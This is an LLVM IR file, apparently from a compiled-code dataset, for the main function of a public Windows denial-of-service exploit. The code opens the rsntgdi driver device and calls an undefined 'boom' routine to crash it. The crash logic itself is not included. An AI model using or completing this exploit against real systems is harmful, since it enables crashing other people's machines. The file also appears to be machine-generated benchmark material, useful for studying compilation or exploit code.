; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_15383.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_15383.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [81 x i8] c"-------------------------------------------------------------------------------\0A\00", align 1
@.str.1 = private unnamed_addr constant [81 x i8] c"---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\0A\00", align 1
@.str.2 = private unnamed_addr constant [81 x i8] c"----------------------------------QQ:289791332---------------------------------\0A\00", align 1
@.str.3 = private unnamed_addr constant [82 x i8] c"-------------------------------------------------------------------------------\0A\0A\00", align 1
@.str.4 = private unnamed_addr constant [12 x i8] c"\\\\.\\rsntgdi\00", align 1
@FILE_SHARE_READ = common dso_local global i32 0, align 4
@FILE_SHARE_WRITE = common dso_local global i32 0, align 4
@OPEN_EXISTING = common dso_local global i32 0, align 4
@DriverHandle = common dso_local global i64 0, align 8
@INVALID_HANDLE_VALUE = common dso_local global i64 0, align 8
@.str.5 = private unnamed_addr constant [21 x i8] c"Open Driver Error!\0A\0A\00", align 1
@.str.6 = private unnamed_addr constant [21 x i8] c"OK.Let's Crash It!\0A\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %6 = call i32 @printf(i8* getelementptr inbounds ([81 x i8], [81 x i8]* @.str, i64 0, i64 0))
  %7 = call i32 @printf(i8* getelementptr inbounds ([81 x i8], [81 x i8]* @.str.1, i64 0, i64 0))
  %8 = call i32 @printf(i8* getelementptr inbounds ([81 x i8], [81 x i8]* @.str.2, i64 0, i64 0))
  %9 = call i32 @printf(i8* getelementptr inbounds ([82 x i8], [82 x i8]* @.str.3, i64 0, i64 0))
  %10 = load i32, i32* @FILE_SHARE_READ, align 4
  %11 = load i32, i32* @FILE_SHARE_WRITE, align 4
  %12 = or i32 %10, %11
  %13 = load i32, i32* @OPEN_EXISTING, align 4
  %14 = call i64 @CreateFile(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.4, i64 0, i64 0), i32 0, i32 %12, i32 0, i32 %13, i32 0, i32 0)
  store i64 %14, i64* @DriverHandle, align 8
  %15 = load i64, i64* @DriverHandle, align 8
  %16 = load i64, i64* @INVALID_HANDLE_VALUE, align 8
  %17 = icmp eq i64 %15, %16
  br i1 %17, label %18, label %20

18:                                               ; preds = %2
  %19 = call i32 @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.5, i64 0, i64 0))
  store i32 0, i32* %3, align 4
  br label %24

20:                                               ; preds = %2
  %21 = call i32 @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.6, i64 0, i64 0))
  %22 = call i32 (...) @getchar()
  %23 = call i32 @boom(i32 -2004318072, i32 -2004318072)
  store i32 0, i32* %3, align 4
  br label %24

24:                                               ; preds = %20, %18
  %25 = load i32, i32* %3, align 4
  ret i32 %25
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i64 @CreateFile(i8*, i32, i32, i32, i32, i32, i32) #1

declare dso_local i32 @getchar(...) #1

declare dso_local i32 @boom(i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
